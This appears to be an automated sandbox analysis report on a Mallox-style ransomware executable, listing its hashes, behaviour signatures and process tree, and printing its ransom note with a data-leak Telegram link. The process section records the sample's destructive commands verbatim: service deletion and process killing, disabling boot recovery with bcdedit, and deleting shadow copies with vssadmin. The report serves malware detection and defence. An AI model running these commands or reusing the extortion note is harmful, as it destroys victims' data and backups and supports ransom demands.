Overview

overview

10

Static

static

10

a5085e5718...25.exe

windows7-x64

10

a5085e5718...25.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-10-2022 16:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525.exe

  • Size

    159KB

  • MD5

    be971d880e75cd48a669ea9e45f6f022

  • SHA1

    43b24f5108ff16c56e836082da80128fe516d8af

  • SHA256

    a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525

  • SHA512

    ded17b8af07b1035d74cbbfeb218c88d12210c047458d4261352613dda693d88259244ad345abef09b016515fe497c49fab944937939a2063ca5249aeb82b064

  • SSDEEP

    3072:o3ypcDozZR/WcCF7dPiyJUh5KvdtEZtPz4g0I/t9L05Uht9uew+BVfRUi29J+L:o3ypcmR/UoyJU8EPPE0tVPtnNgg

Score
10/10
evasionransomware

Malware Config

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-2295526160-1155304984-640977766-1000\RECOVERY FILES.txt

Ransom Note
YOUR FILES ARE ENCRYPTED !!! TO DECRYPT, FOLLOW THE INSTRUCTIONS: To recover data you need decrypt tool. To get the decrypt tool you should: 1.In the letter include your personal ID! Send me this ID in your first email to me! 2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files! 3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! 4.We can decrypt few files in quality the evidence that we have the decoder. Do not rename, do not use third-party software or the data will be permanently damaged CONTACT US: [email protected] If first email will not reply in 24 hours then contact with reserve address: [email protected] YOUR PERSONAL ID: EACF8F995F77 In case of non-payment of the ransom, your data may be published in the public domain. Our page in telegram with data leaks: https://t.me/mallox_leaks �
URLs

https://t.me/mallox_leaks

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Stops running service(s) 3 TTPs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525.exe
    "C:\Users\Admin\AppData\Local\Temp\a5085e571857ec54cf9625050dfc29a195dad4d52bea9b69d3f22e33ed636525.exe"
    1⤵
    • Modifies extensions of user files
    • Checks computer location settings
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3320
      • C:\Windows\SysWOW64\sc.exe
        sc delete MsDtsServer100
        3⤵
        • Launches sc.exe
        PID:4404
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
      2⤵
        PID:4144
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
        2⤵
          PID:504
        • C:\Windows\system32\vssadmin.exe
          "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
          2⤵
          • Interacts with shadow copies
          PID:1036
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1320

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads